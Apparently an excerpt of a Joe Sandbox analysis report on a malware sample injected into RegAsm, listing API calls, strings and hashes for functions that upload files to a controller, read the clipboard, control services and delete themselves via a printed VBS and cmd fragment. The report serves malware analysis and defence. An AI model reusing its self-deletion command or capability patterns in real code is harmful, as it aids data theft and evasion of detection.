                                                                                  • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                  • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                  • API String ID: 3086580692-2582957567
                                                                                  • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                  • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                  • _free.LIBCMT ref: 0045137F
                                                                                    • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                  • _free.LIBCMT ref: 004513A1
                                                                                  • _free.LIBCMT ref: 004513B6
                                                                                  • _free.LIBCMT ref: 004513C1
                                                                                  • _free.LIBCMT ref: 004513E3
                                                                                  • _free.LIBCMT ref: 004513F6
                                                                                  • _free.LIBCMT ref: 00451404
                                                                                  • _free.LIBCMT ref: 0045140F
                                                                                  • _free.LIBCMT ref: 00451447
                                                                                  • _free.LIBCMT ref: 0045144E
                                                                                  • _free.LIBCMT ref: 0045146B
                                                                                  • _free.LIBCMT ref: 00451483
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                  • API String ID: 489098229-1431523004
                                                                                  • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                  • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                  APIs
                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                  • API String ID: 1913171305-3159800282
                                                                                  • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                  • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                  • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                  APIs
                                                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  • String ID: H
                                                                                  • API String ID: 4237864984-2852464175
                                                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: \&G$\&G$`&G
                                                                                  • API String ID: 269201875-253610517
                                                                                  • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                  • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 65535$udp
                                                                                  • API String ID: 0-1267037602
                                                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                  • _free.LIBCMT ref: 0043A9C3
                                                                                  • _free.LIBCMT ref: 0043A9CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                  • String ID:
                                                                                  • API String ID: 2441525078-0
                                                                                  • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                  • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                  • API String ID: 2956720200-749203953
                                                                                  • Opcode ID: 4ecc4465ac07baa48c339e1f37220a08a823f0804fa7a25c598d6265affc9452
                                                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                  • Opcode Fuzzy Hash: 4ecc4465ac07baa48c339e1f37220a08a823f0804fa7a25c598d6265affc9452
                                                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                  APIs
                                                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                  • String ID: 0VG$0VG$<$@$Temp
                                                                                  • API String ID: 1704390241-2575729100
                                                                                  • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                  • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                  APIs
                                                                                  • OpenClipboard.USER32 ref: 0041697C
                                                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                  • String ID: !D@
                                                                                  • API String ID: 2172192267-604454484
                                                                                  • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                  • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
